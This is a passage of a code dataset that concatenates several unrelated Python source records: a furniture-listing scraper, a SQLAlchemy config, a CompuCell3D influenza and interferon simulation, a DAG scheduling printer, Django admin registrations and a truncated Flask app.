warn_if_not_found=True):\n result = _Definitions.get(self, obj, attr)\n if result is None and warn_if_not_found:\n result = [] # the caller might expect a list\n if (obj, attr) not in self._style_warnings:\n self._style_warnings.append((obj, attr))\n warning(\"no value found for %s.%s (check style.txt)\", obj, attr)\n return result\n\n def has(self, obj, attr):\n return self.get(obj, attr, False) is not None\n\n\n# AI (probably completely separate)\n\ndef _read_ai_to_dict(s, d):\n s = preprocess(s)\n name = None\n for line in s.split(\"\\n\"):\n words = line.split()\n if not words: continue\n if words[0] == \"def\":\n name = words[1]\n d[name] = []\n elif name is not None:\n d[name] += [line]\n else:\n warning(\"'def ' is missing (check ai.txt)\")\n\n_ai = {}\n\ndef load_ai(*strings):\n global _ai\n _ai = {}\n for s in strings:\n _read_ai_to_dict(s, _ai)\n\ndef get_ai(name):\n return _ai[name]\n\ndef get_ai_names():\n return _ai.keys()\n\n# define two convenient variables\n\nrules = Rules()\nstyle = Style()\n","repo_name":"sanslash332/soundrts","sub_path":"soundrts/definitions.py","file_name":"definitions.py","file_ext":"py","file_size_in_byte":7895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"38895157077","text":"# for pagination, we need to get the next page link and then parse the links from that page.\n\nimport httpx\nfrom selectolax.parser import HTMLParser\nfrom dataclasses import dataclass\nfrom urllib.parse import urljoin\nfrom rich import print\nimport json\nimport csv\n\n@dataclass\nclass Product:\n name: str\n sku: str\n price: str\n rating: str # store the html for now. all are SVGs. looks sussy \n\n@dataclass\nclass Response:\n body_html: HTMLParser\n next_page: str\n\ndef get_page(client, url, n):\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\"\n }\n urlPage = url[:-1] + f\"{n}\" \n r = client.get(urlPage, headers=headers)\n html = HTMLParser(r.text)\n # check if the current page is in range by checking for presence of a div with the data-qa attribute of hits\n if html.css_first(\"div[data-qa=hits]\"):\n next_page = url[:-1] + f\"{n+1}\"\n print(next_page)\n else:\n next_page = \"None\"\n return Response(body_html=html, next_page=next_page)\n\ndef parse_listings(html):\n listings = html.css(\"div[data-qa=hits] > div > div > div > a\")\n return set(link.attrs[\"href\"] for link in listings)\n\ndef pagination_loop(client): # returns all pages of individual sofa listings\n url = \"https://www.castlery.com/sg/sofas/all-sofas?p=1\"\n page_num = 1\n page = get_page(client, url, page_num)\n links = parse_listings(page.body_html)\n while page.next_page != \"None\":\n print(\"current page: \", page_num)\n page = get_page(client,page.next_page, page_num)\n links |= parse_listings(page.body_html) # union the links\n print(\"links: \", len(links))\n page_num += 1\n return links\n\ndef main():\n client = httpx.Client()\n links = pagination_loop(client)\n print(links)\n\nif __name__ == \"__main__\":\n main()","repo_name":"yijiyap/projectscrape","sub_path":"2-castlery/3-scraper.py","file_name":"3-scraper.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"74294478470","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\nimport os\n\n\nDB_HOSTNAME = os.environ[\"DB_HOSTNAME\"]\n\nSQLALCHEMY_DATABASE_URI = f\"postgresql://docker:docker@{DB_HOSTNAME}/dogbreed\"\n\nengine = create_engine(SQLALCHEMY_DATABASE_URI, pool_pre_ping=True)\n\nSessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n\nBase = declarative_base()\n\n\ndef get_db():\n try:\n db = SessionLocal()\n yield db\n finally:\n db.close()\n","repo_name":"calanco/dogbreed","sub_path":"app/config/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22185829419","text":"from cc3d.core.PySteppables import *\nimport numpy as np\n\nplot_ODEModel = False\nplot_CellModel = True\nplot_PlaqueAssay = True\n\ncouple_Models = True\nhow_to_determine_V = 2 # Determines the V from the ODE model (1) or from field (2)\nhow_to_determine_IFNe = 2 # Determines the IFNe from the ODE model (1) or from field (2)\n\nmin_to_mcs = 10.0 # min/mcs\nhours_to_mcs = min_to_mcs / 60.0 # hours/mcs\ndays_to_mcs = min_to_mcs / 1440.0 # day/mcs\nhours_to_simulate = 50.0 # 10 in the original model\n\n'''Smith AP, Moquin DJ, Bernhauerova V, Smith AM. Influenza virus infection model with density dependence \nsupports biphasic viral decay. Frontiers in microbiology. 2018 Jul 10;9:1554.'''\n\nFluModel_string = ''' \n model FluModel()\n\n //State Variables and Transitions\n V1: -> T ; -beta * V * T ; // Susceptible Cells\n V2: -> I1 ; beta * V * T - k * I1 ; // Early Infected Cells\n V3: -> I2 ; k * I1 - delta_d * I2 / (K_delta + I2) ; // Late Infected Cells\n V4: -> V ; p * I2 - c * V ; // Extracellular Virus\n V5: -> D ; delta_d * I2 / (K_delta + I2) ; // Cleared Infected Cells (for Bookkeeping)\n\n //Parameters\n beta = 2.4* 10^(-4) ; // Virus Infective\n p = 1.6 ; // Virus Production\n c = 13.0 ; // Virus Clearance\n k = 4.0 ; // Eclipse phase\n delta_d = 1.6 * 10^6 ; // Infected Cell Clearance\n K_delta = 4.5 * 10^5 ; // Half Saturation Constant \n\n // Initial Conditions ;\n T0 = 1.0*10^7;\n T = T0 ; // Initial Number of Uninfected Cells\n I1 = 75.0 ; // Initial Number of Infected Cells\nend'''\n\n'''Jordan J. A. Weaver and Jason E. Shoemaker. Mathematical Modeling of RNA Virus Sensing Pathways Reveal Paracrine Signaling as the Primary Factor \nRegulating Excessive Cytokine Production'''\n\nIFNModel_string = '''\n //Equations\n E2a: -> IFN ; P*(k11*RIGI*V+k12*(V^n)/(k13+(V^n))+k14*IRF7P) ;\n E2b: IFN -> IFNe ; k21*IFN ;\n E3a: IFNe -> ; t2*IFNe ;\n E4a: -> STATP ; P*k31*IFNe/(k32+k33*IFNe) ;\n E4b: STATP -> ; t3*STATP ;\n E5a: -> IRF7 ; P*(k41*STATP+k42*IRF7P) ;\n E5b: IRF7 -> ; t4*IRF7 ;\n E6a: -> IRF7P ; P*k51*IRF7 ;\n E6b: IRF7P -> ; t5*IRF7P ;\n E7a: P -> ; P*k61*V ;\n E8a: -> V ; P*(k71*V)/(1.0+k72*IFNe*7E-5) ;\n E8b: V -> ; k73*V ;\n\n //Parameters\n k11 = 0.0 ; \n k12 = 9.746 ; \n k13 = 12.511 ; \n k14 = 13.562 ;\n k21 = 10.385 ;\n t2 = 3.481 ;\n k31 = 45.922 ;\n k32 = 5.464 ;\n k33 = 0.068 ;\n t3 = 0.3 ;\n k41 = 0.115 ;\n k42 = 1.053 ;\n t4 = 0.75 ;\n k51 = 0.202 ;\n t5 = 0.3 ;\n k61 = 0.635 ;\n k71 = 1.537 ;\n k72 = 47.883 ;\n k73 = 0.197 ;\n n = 3.0 ;\n\n //Initial Conditions\n P = 1.0 ;\n RIGI = 1.0 ;\n IRF7 = 0.0 ;\n V = 6.9e-8 ;\n'''\n\n# Viral Replication Model\nviral_model_string = '''\n E7a: P -> ; P*k61*V ;\n E8a: -> V ; P*k71*V/(1.0+k72*IFNe*7E-5) ;\n E8b: V -> ; k73*V ;\n\n //Parameters\n k61 = 0.635 ;\n k71 = 1.537 ;\n k72 = 47.883 ;\n k73 = 0.197 ;\n\n //Initial Conditions\n P = 1.0 ;\n V = 0.0 ; \n \n //Inputs\n IFNe = 0.0 ;\n'''\n\nIFN_model_string = '''\n //Equations\n E2a: -> IFN ; P*(k12*(V^n)/(k13+(V^n))+k14*IRF7P) ;\n E2b: IFN -> ; k21*IFN ;\n E4a: -> STATP ; P*k31*IFNe/(k32+k33*IFNe) ;\n E4b: STATP -> ; t3*STATP ;\n E5a: -> IRF7 ; P*(k41*STATP+k42*IRF7P) ;\n E5b: IRF7 -> ; t4*IRF7 ;\n E6a: -> IRF7P ; P*k51*IRF7 ;\n E6b: IRF7P -> ; t5*IRF7P ;\n\n //Parameters\n k12 = 9.746 ; \n k13 = 12.511 ; \n k14 = 13.562 ;\n k21 = 10.385 ; // CHANGED\n t2 = 3.481 ;\n k31 = 45.922 * 100.0 ; // CHANGED\n k32 = 5.464 ;\n k33 = 0.068 ;\n t3 = 0.3 ;\n k41 = 0.115 ;\n k42 = 1.053 ;\n t4 = 0.75 ;\n k51 = 0.202 ;\n t5 = 0.3 ;\n n = 3.0 ;\n\n // Inputs\n P = 0.0 ;\n V = 0.0 ;\n IFNe = 0.0 ;\n'''\n\nclass ODEModelSteppable(SteppableBasePy):\n def __init__(self, frequency=1):\n SteppableBasePy.__init__(self, frequency)\n\n def start(self):\n self.shared_steppable_vars['InitialNumberCells'] = len(self.cell_list_by_type(self.U))\n\n self.get_xml_element('simulation_steps').cdata = hours_to_simulate / hours_to_mcs\n\n # Adding free floating antimony model\n self.add_free_floating_antimony(model_string=FluModel_string, model_name='FluModel',\n step_size=days_to_mcs)\n\n # Changing initial values according to discussions with Amber Smith\n # self.sbml.FluModel['I1'] = 0.0\n # self.sbml.FluModel['V'] = 75.0\n self.sbml.FluModel['I1'] = 1.0 / self.shared_steppable_vars['InitialNumberCells']\n self.sbml.FluModel['V'] = 0.0\n\n self.add_free_floating_antimony(model_string=IFNModel_string, model_name='IFNModel',\n step_size=hours_to_mcs)\n\n self.add_antimony_to_cell_types(model_string=viral_model_string, model_name='VModel',\n cell_types=[self.U], step_size=hours_to_mcs)\n\n self.add_antimony_to_cell_types(model_string=IFN_model_string, model_name='IModel',\n cell_types=[self.U], step_size=hours_to_mcs)\n\n # Initial conditions with infected cell in the center\n cell = self.cell_field[self.dim.x // 2, self.dim.y // 2, 0]\n cell.type = self.I1\n cell.sbml.VModel['V'] = 6.9e-8\n if not couple_Models:\n self.get_xml_element('IFNe_dc').cdata = 0.0\n for cell in self.cell_list_by_type(self.U,self.I1):\n cell.type = self.I2\n cell.sbml.VModel['V'] = 6.9e-8\n\n def step(self, mcs):\n self.timestep_sbml()\n\nclass CellularModelSteppable(SteppableBasePy):\n def __init__(self, frequency=1):\n SteppableBasePy.__init__(self, frequency)\n\n def start(self):\n # set initial model parameters\n self.ExtracellularIFN = self.sbml.IFNModel['IFNe']\n self.get_xml_element('IFNe_decay').cdata = self.sbml.IFNModel['t2'] * hours_to_mcs\n self.ExtracellularVirus = self.sbml.FluModel['V']\n self.get_xml_element('virus_decay').cdata = self.sbml.FluModel['c'] * days_to_mcs\n\n def step(self, mcs):\n secretorV = self.get_field_secretor(\"Virus\")\n secretorIFN = self.get_field_secretor(\"IFNe\")\n\n ## U to I1 transition - Amber Model\n # V1: T -> U ; beta * V * T\n for cell in self.cell_list_by_type(self.U):\n # Determine V from scalar virus from the ODE\n if how_to_determine_V == 1:\n b = self.sbml.FluModel['beta'] * self.sbml.FluModel['T0'] * days_to_mcs\n V = self.sbml.FluModel['V'] / self.sbml.FluModel['T0']\n # Determine V from the virus field\n if how_to_determine_V == 2:\n b = self.sbml.FluModel['beta'] * self.shared_steppable_vars['InitialNumberCells'] * days_to_mcs\n V = secretorV.amountSeenByCell(cell)\n p_UtoI1 = b * V\n if np.random.random() < p_UtoI1:\n cell.type = self.I1\n cell.sbml.VModel['V'] = 6.9e-8\n\n ## I1 to I2 transition - Amber Model\n # V2: I1 -> I2 ; k * I1\n for cell in self.cell_list_by_type(self.I1):\n k = self.sbml.FluModel['k'] * days_to_mcs\n p_T1oI2 = k\n if np.random.random() < p_T1oI2:\n cell.type = self.I2\n\n ## P to D transition - Jordan Model\n # E7a: P -> ; P * k61 * V;\n for cell in self.cell_list_by_type(self.I2):\n k61 = cell.sbml.VModel['k61'] * hours_to_mcs\n V = cell.sbml.VModel['V']\n P = cell.sbml.VModel['P']\n p_I2toD = k61 * V * (1-P)\n if np.random.random() < p_I2toD:\n cell.type = self.DEAD\n\n ## Updating values of intracellular models\n for cell in self.cell_list:\n if couple_Models:\n cell.sbml.IModel['V'] = cell.sbml.VModel['V']\n cell.sbml.IModel['P'] = cell.sbml.VModel['P']\n IFNe = secretorIFN.amountSeenByCell(cell)\n cell.sbml.IModel['IFNe'] = IFNe\n cell.sbml.VModel['IFNe'] = IFNe\n if not couple_Models:\n if how_to_determine_IFNe == 2:\n cell.sbml.IModel['V'] = cell.sbml.VModel['V']\n cell.sbml.IModel['P'] = cell.sbml.VModel['P']\n IFNe = secretorIFN.amountSeenByCell(cell)\n cell.sbml.IModel['IFNe'] = IFNe\n cell.sbml.VModel['IFNe'] = IFNe\n if how_to_determine_IFNe == 1:\n ## Inputs to the INF model\n cell.sbml.IModel['V'] = self.sbml.IFNModel['V']\n cell.sbml.IModel['P'] = self.sbml.IFNModel['P']\n cell.sbml.IModel['IFNe'] = self.sbml.IFNModel['IFNe']\n ## Inputs to the Virus model\n cell.sbml.VModel['IFNe'] = self.sbml.IFNModel['IFNe']\n\n ## Production of extracellular IFN - Jordan Model\n # E2b: IFN -> IFNe; k21 * IFN ;\n I = self.ExtracellularIFN\n k21 = self.sbml.IFNModel['k21'] * hours_to_mcs\n for cell in self.cell_list_by_type(self.U,self.I1,self.I2):\n intracellularIFN = cell.sbml.IModel['IFN']\n p = k21 * intracellularIFN\n release = secretorIFN.secreteInsideCellTotalCount(cell, p / cell.volume)\n self.ExtracellularIFN += release.tot_amount\n # E3a: IFNe -> ; t2*IFNe ;\n t2 = self.sbml.IFNModel['t2'] * hours_to_mcs\n self.ExtracellularIFN -= t2 * I\n\n ## Measure amount of extracellular IFN field\n num_cells = len(self.cell_list_by_type(self.U, self.I1, self.I2, self.DEAD))\n num_living = len(self.cell_list_by_type(self.U, self.I1, self.I2))\n self.ExtracellularIFN_Field = self.get_field_secretor(\"IFNe\").totalFieldIntegral() / num_cells * num_living\n # self.ExtracellularIFN_Field *= (1 - t2)\n\n ## Production of extracellular virus - Jordan Model\n # E8b: V -> ; k73 * V\n V = self.ExtracellularVirus\n k73 = self.sbml.IFNModel['k73'] * hours_to_mcs\n for cell in self.cell_list_by_type(self.I2):\n Virus = cell.sbml.VModel['V']\n p = k73 * Virus * 1094460.28\n release = secretorV.secreteInsideCellTotalCount(cell, p / cell.volume)\n self.ExtracellularVirus += release.tot_amount\n c = self.sbml.FluModel['c'] * days_to_mcs\n self.ExtracellularVirus -= c * V\n\n ## Measure amount of extracellular virus field\n self.ExtracellularVirus_Field = 0\n for cell in self.cell_list_by_type(self.U,self.I1,self.I2):\n V = secretorV.amountSeenByCell(cell)\n self.ExtracellularVirus_Field += V\n\n # Dictonary to pass information between steppables\n self.shared_steppable_vars['ExtracellularIFN'] = self.ExtracellularIFN\n self.shared_steppable_vars['ExtracellularIFN_Field'] = self.ExtracellularIFN_Field\n self.shared_steppable_vars['ExtracellularVirus'] = self.ExtracellularVirus\n self.shared_steppable_vars['ExtracellularVirus_Field'] = self.ExtracellularVirus_Field\n\nclass IFNPlotSteppable(SteppableBasePy):\n def __init__(self, frequency=1):\n SteppableBasePy.__init__(self, frequency)\n\n def start(self):\n self.initial_infected = len(self.cell_list_by_type(self.U))\n # Initialize Graphic Window for Jordan IFN model\n if (plot_ODEModel == True) or (plot_CellModel == True):\n self.plot_win1 = self.add_new_plot_window(title='V',\n x_axis_title='Hours',\n y_axis_title='Variable', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n self.plot_win2 = self.add_new_plot_window(title='H',\n x_axis_title='Hours',\n y_axis_title='Variable', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n self.plot_win3 = self.add_new_plot_window(title='P',\n x_axis_title='Hours',\n y_axis_title='Variable', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n self.plot_win4 = self.add_new_plot_window(title='IFNe',\n x_axis_title='Hours',\n y_axis_title='Variable', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n self.plot_win5 = self.add_new_plot_window(title='STATP',\n x_axis_title='Hours',\n y_axis_title='Variable', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n self.plot_win6 = self.add_new_plot_window(title='IRF7',\n x_axis_title='Hours',\n y_axis_title='Variable', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n self.plot_win7 = self.add_new_plot_window(title='IRF7P',\n x_axis_title='Hours',\n y_axis_title='Variable', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n self.plot_win8 = self.add_new_plot_window(title='INF',\n x_axis_title='Hours',\n y_axis_title='Variable', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n if plot_ODEModel:\n self.plot_win1.add_plot(\"ODEV\", style='Dots', color='yellow', size=5)\n self.plot_win2.add_plot(\"ODEH\", style='Dots', color='white', size=5)\n self.plot_win3.add_plot(\"ODEP\", style='Dots', color='red', size=5)\n self.plot_win4.add_plot(\"ODEIFNe\", style='Dots', color='orange', size=5)\n self.plot_win5.add_plot(\"ODESTATP\", style='Dots', color='blue', size=5)\n self.plot_win6.add_plot(\"ODEIRF7\", style='Dots', color='green', size=5)\n self.plot_win7.add_plot(\"ODEIRF7P\", style='Dots', color='purple', size=5)\n self.plot_win8.add_plot(\"ODEIFN\", style='Dots', color='magenta', size=5)\n\n if plot_CellModel:\n self.plot_win1.add_plot(\"CC3DV\", style='Lines', color='yellow', size=5)\n self.plot_win2.add_plot(\"CC3DH\", style='Lines', color='white', size=5)\n self.plot_win3.add_plot(\"CC3DP\", style='Lines', color='red', size=5)\n self.plot_win4.add_plot(\"CC3DIFNe\", style='Lines', color='orange', size=5)\n self.plot_win4.add_plot(\"CC3DIFNe2\", style='Lines', color='yellow', size=5)\n self.plot_win5.add_plot(\"CC3DSTATP\", style='Lines', color='blue', size=5)\n self.plot_win6.add_plot(\"CC3DIRF7\", style='Lines', color='green', size=5)\n self.plot_win7.add_plot(\"CC3DIRF7P\", style='Lines', color='purple', size=5)\n self.plot_win8.add_plot(\"CC3DIFN\", style='Lines', color='magenta', size=5)\n\n def step(self, mcs):\n if plot_ODEModel:\n L = len(self.cell_list_by_type(self.U,self.I1,self.I2))\n self.plot_win1.add_data_point(\"ODEV\", mcs * hours_to_mcs, self.sbml.IFNModel['V'])\n self.plot_win2.add_data_point(\"ODEH\", mcs * hours_to_mcs, self.sbml.IFNModel['P'])\n self.plot_win3.add_data_point(\"ODEP\", mcs * hours_to_mcs, self.sbml.IFNModel['P'])\n self.plot_win4.add_data_point(\"ODEIFNe\", mcs * hours_to_mcs, self.sbml.IFNModel['IFNe']*L)\n self.plot_win5.add_data_point(\"ODESTATP\", mcs * hours_to_mcs, self.sbml.IFNModel['STATP'])\n self.plot_win6.add_data_point(\"ODEIRF7\", mcs * hours_to_mcs, self.sbml.IFNModel['IRF7'])\n self.plot_win7.add_data_point(\"ODEIRF7P\", mcs * hours_to_mcs, self.sbml.IFNModel['IRF7P'])\n self.plot_win8.add_data_point(\"ODEIFN\", mcs * hours_to_mcs, self.sbml.IFNModel['IFN'])\n\n if plot_CellModel:\n L = len(self.cell_list_by_type(self.U,self.I1,self.I2))\n avgV = 0.0\n avgH = 0.0\n avgSTATP = 0.0\n avgIRF7 = 0.0\n avgIRF7P = 0.0\n avgIFN = 0.0\n\n for cell in self.cell_list_by_type(self.U,self.I1,self.I2):\n avgV += cell.sbml.VModel['V'] / L\n avgH += cell.sbml.VModel['P'] / L\n avgSTATP += cell.sbml.IModel['STATP'] / L\n avgIRF7 += cell.sbml.IModel['IRF7'] / L\n avgIRF7P += cell.sbml.IModel['IRF7P'] / L\n avgIFN += cell.sbml.IModel['IFN'] / L\n\n self.plot_win1.add_data_point(\"CC3DV\", mcs * hours_to_mcs, avgV)\n self.plot_win2.add_data_point(\"CC3DH\", mcs * hours_to_mcs, avgH)\n self.plot_win3.add_data_point(\"CC3DP\", mcs * hours_to_mcs,\n L / self.shared_steppable_vars['InitialNumberCells'])\n self.plot_win4.add_data_point(\"CC3DIFNe\", mcs * hours_to_mcs,\n self.shared_steppable_vars['ExtracellularIFN'])\n self.plot_win4.add_data_point(\"CC3DIFNe2\", mcs * hours_to_mcs,\n self.shared_steppable_vars['ExtracellularIFN_Field'])\n self.plot_win5.add_data_point(\"CC3DSTATP\", mcs * hours_to_mcs, avgSTATP)\n self.plot_win6.add_data_point(\"CC3DIRF7\", mcs * hours_to_mcs, avgIRF7)\n self.plot_win7.add_data_point(\"CC3DIRF7P\", mcs * hours_to_mcs, avgIRF7P)\n self.plot_win8.add_data_point(\"CC3DIFN\", mcs * hours_to_mcs, avgIFN)\n\nclass FluPlotSteppable(SteppableBasePy):\n def __init__(self, frequency=1):\n SteppableBasePy.__init__(self, frequency)\n\n def start(self):\n if couple_Models:\n self.initial_uninfected = len(self.cell_list_by_type(self.U))\n if (plot_ODEModel == True) or (plot_CellModel == True):\n self.plot_win9 = self.add_new_plot_window(title='Flu Model Cells',\n x_axis_title='Hours',\n y_axis_title='Variables', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n self.plot_win10 = self.add_new_plot_window(title='Flu Model Virus',\n x_axis_title='Hours',\n y_axis_title='Virus', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n\n if plot_ODEModel == True:\n self.plot_win9.add_plot(\"ODET\", style='Dots', color='blue', size=5)\n self.plot_win9.add_plot(\"ODEI1\", style='Dots', color='orange', size=5)\n self.plot_win9.add_plot(\"ODEI2\", style='Dots', color='red', size=5)\n self.plot_win9.add_plot(\"ODED\", style='Dots', color='purple', size=5)\n self.plot_win10.add_plot(\"ODEV\", style='Dots', color='blue', size=5)\n\n if plot_CellModel == True:\n self.plot_win9.add_plot(\"CC3DT\", style='Lines', color='blue', size=5)\n self.plot_win9.add_plot(\"CC3DI1\", style='Lines', color='orange', size=5)\n self.plot_win9.add_plot(\"CC3DI2\", style='Lines', color='red', size=5)\n self.plot_win9.add_plot(\"CC3DD\", style='Lines', color='purple', size=5)\n self.plot_win10.add_plot(\"CC3DV\", style='Lines', color='blue', size=5)\n\n def step(self, mcs):\n if couple_Models:\n if (plot_ODEModel == True) or (plot_CellModel == True):\n if plot_ODEModel == True:\n self.plot_win9.add_data_point(\"ODET\", mcs * days_to_mcs * 24.0,\n self.sbml.FluModel['T'] / self.sbml.FluModel['T0'])\n self.plot_win9.add_data_point(\"ODEI1\", mcs * days_to_mcs * 24.0,\n self.sbml.FluModel['I1'] / self.sbml.FluModel['T0'])\n self.plot_win9.add_data_point(\"ODEI2\", mcs * days_to_mcs * 24.0,\n self.sbml.FluModel['I2'] / self.sbml.FluModel['T0'])\n self.plot_win9.add_data_point(\"ODED\", mcs * days_to_mcs * 24.0,\n self.sbml.FluModel['D'] / self.sbml.FluModel['T0'])\n self.plot_win10.add_data_point(\"ODEV\", mcs * days_to_mcs * 24.0,\n np.log10(self.sbml.FluModel['V']))\n\n if plot_CellModel == True:\n self.plot_win9.add_data_point(\"CC3DT\", mcs * days_to_mcs * 24.0,\n len(self.cell_list_by_type(self.U)) / self.initial_uninfected)\n self.plot_win9.add_data_point(\"CC3DI1\", mcs * days_to_mcs * 24.0,\n len(self.cell_list_by_type(self.I1)) / self.initial_uninfected)\n self.plot_win9.add_data_point(\"CC3DI2\", mcs * days_to_mcs * 24.0,\n len(self.cell_list_by_type(self.I2)) / self.initial_uninfected)\n self.plot_win9.add_data_point(\"CC3DD\", mcs * days_to_mcs * 24.0,\n len(self.cell_list_by_type(self.DEAD)) / self.initial_uninfected)\n self.plot_win10.add_data_point(\"CC3DV\", mcs * days_to_mcs * 24.0,\n np.log10(self.shared_steppable_vars['ExtracellularVirus_Field']))\n\nclass PlaqueAssaySteppable(SteppableBasePy):\n def __init__(self, frequency=1):\n SteppableBasePy.__init__(self, frequency)\n\n def start(self):\n if plot_PlaqueAssay == True:\n self.plot_win11 = self.add_new_plot_window(title='Plaque Growth',\n x_axis_title='Hours',\n y_axis_title='Avg Radial Distance', x_scale_type='linear',\n y_scale_type='linear',\n grid=False, config_options={'legend': True})\n self.plot_win11.add_plot(\"rdI1\", style='Lines', color='orange', size=5)\n self.plot_win11.add_plot(\"rdI2\", style='Lines', color='red', size=5)\n self.plot_win11.add_plot(\"rdD\", style='Lines', color='purple', size=5)\n\n self.plot_win12 = self.add_new_plot_window(title='Effective Infectivity',\n x_axis_title='Hours',\n y_axis_title='Effective Infectivity', x_scale_type='linear',\n y_scale_type='log',\n grid=False, config_options={'legend': True})\n self.plot_win12.add_plot(\"ODEB\", style='Dots', color='blue', size=5)\n self.plot_win12.add_plot(\"CC3DBeff\", style='Lines', color='blue', size=5)\n self.previousT = 0.0\n\n def step(self, mcs):\n if plot_PlaqueAssay == True:\n avgI1rd = 0.0\n num_I1 = len(self.cell_list_by_type(self.I1))\n for cell in self.cell_list_by_type(self.I1):\n xCOM = cell.xCOM\n yCOM = cell.yCOM\n avgI1rd += sqrt((self.dim.x/2.0 - xCOM)**2 + (self.dim.y/2.0-yCOM)**2) / num_I1\n\n avgI2rd = 0.0\n num_I2 = len(self.cell_list_by_type(self.I2))\n for cell in self.cell_list_by_type(self.I2):\n xCOM = cell.xCOM\n yCOM = cell.yCOM\n avgI2rd += sqrt((self.dim.x/2.0 - xCOM)**2 + (self.dim.y/2.0-yCOM)**2) / num_I2\n\n avgDrd = 0.0\n num_D = len(self.cell_list_by_type(self.DEAD))\n for cell in self.cell_list_by_type(self.DEAD):\n xCOM = cell.xCOM\n yCOM = cell.yCOM\n avgDrd += sqrt((self.dim.x/2.0 - xCOM)**2 + (self.dim.y/2.0-yCOM)**2) / num_D\n\n self.plot_win11.add_data_point(\"rdI1\", mcs * hours_to_mcs, avgI1rd)\n self.plot_win11.add_data_point(\"rdI2\", mcs * hours_to_mcs, avgI2rd)\n self.plot_win11.add_data_point(\"rdD\", mcs * hours_to_mcs, avgDrd)\n\n Beff = 0.0\n num_T = len(self.cell_list_by_type(self.U))\n dT = abs(num_T - self.previousT)\n self.previousT = num_T\n if self.shared_steppable_vars['ExtracellularVirus_Field']:\n Beff = dT / (num_T*self.shared_steppable_vars['ExtracellularVirus_Field']*hours_to_mcs)\n\n self.plot_win12.add_data_point(\"ODEB\", mcs * hours_to_mcs,self.sbml.FluModel['beta'])\n self.plot_win12.add_data_point(\"CC3DBeff\", mcs * hours_to_mcs, Beff)","repo_name":"joaponte/CellularizedModels","sub_path":"JordanAmberModel/Simulation/JordanAmberModelSteppables.py","file_name":"JordanAmberModelSteppables.py","file_ext":"py","file_size_in_byte":28144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71314251593","text":"\"\"\"\nPrint the scheduling result for the appointed DAG.\n Author: Hailiang Zhao (hliangzhao@zju.edu.cn)\n\"\"\"\nimport pprint\nfrom collections import namedtuple\nfrom embedding.scenario import para\n\n\nEvent = namedtuple('Event', 'start end')\n\n\ndef print_scheduling_results(T_optimal_all, DAGs_deploy, process_sequence_all, start_time_all, DAG_num):\n \"\"\"\n Print the scheduling results of the given DAG.\n \"\"\"\n DAG_deploy = DAGs_deploy[DAG_num]\n T_optimal = T_optimal_all[DAG_num]\n process_sequence = process_sequence_all[DAG_num]\n start_time = start_time_all[DAG_num]\n\n schedules = [[] for _ in range(para.get_server_num())]\n for func in process_sequence:\n chosen_server = int(DAG_deploy[func - 1])\n pair = {'func=' + str(func): Event(start=start_time[func - 1], end=T_optimal[func - 1][chosen_server])}\n schedules[chosen_server].append(pair)\n schedules_dict = {}\n for n in range(para.get_server_num()):\n schedules_dict['server ' + str(n + 1)] = schedules[n]\n print('\\nThe finish time of each function on the chosen server for DAG #%d:' % DAG_num)\n pprint.pprint(schedules_dict)\n","repo_name":"hliangzhao/embedding","sub_path":"embedding/algos/interpretate_result.py","file_name":"interpretate_result.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"27"} +{"seq_id":"7826047307","text":"import django.db.models\nfrom django.contrib import admin\nfrom app import models\n\n\n@admin.register(models.Sniffer)\nclass SnifferAdmin(admin.ModelAdmin):\n\tfields = ('location', 'serial_code', ('owner',))\n\tlist_display = ('serial_code', 'location')\n\tlist_display_links = ('serial_code',)\n\n\n@admin.register(models.BeaconDevice)\nclass BeaconAdmin(admin.ModelAdmin):\n\tfields = ('mac_addr', 'owner')\n\tlist_display = ('mac_addr', 'owner')\n\tlist_display_links = ('mac_addr',)\n\tsearch_fields = ['owner__email', 'mac_addr']\n\n\n@admin.register(models.TrackingEvent)\nclass EventAdmin(admin.ModelAdmin):\n\tordering = ['event_time']\n\tdate_hierarchy = 'event_time'\n\tlist_display = ('event_time', 'beacon_addr', 'sniffer_serial')\n\tlist_display_links = ('event_time',)","repo_name":"PKmnman/Pawpharos-Web","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"4210983106","text":"from flask import Flask, render_template, request\nfrom collections import Counter\nimport json\nimport pandas as pd\ndata = pd.read_csv('cleaned.csv')\n\napp = Flask(__name__)\ns_name = [i.lower() for i in list(data['State'])]\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n@app.route('/state/')\ndef state(name):\n if name.lower() in s_name:\n ids = s_name.index(name.lower())\n result = json.dumps({'State': data.iloc[ids]['State'], 'Age-adjusted incidence rate (cases per 100k)':data.iloc[ids]['Age-Adjusted Incidence Rate([rate note]) - cases per 100,000']})\n return result\n return 'not valid'\n\n@app.route(\"/info\", methods=[\"GET\"])\ndef 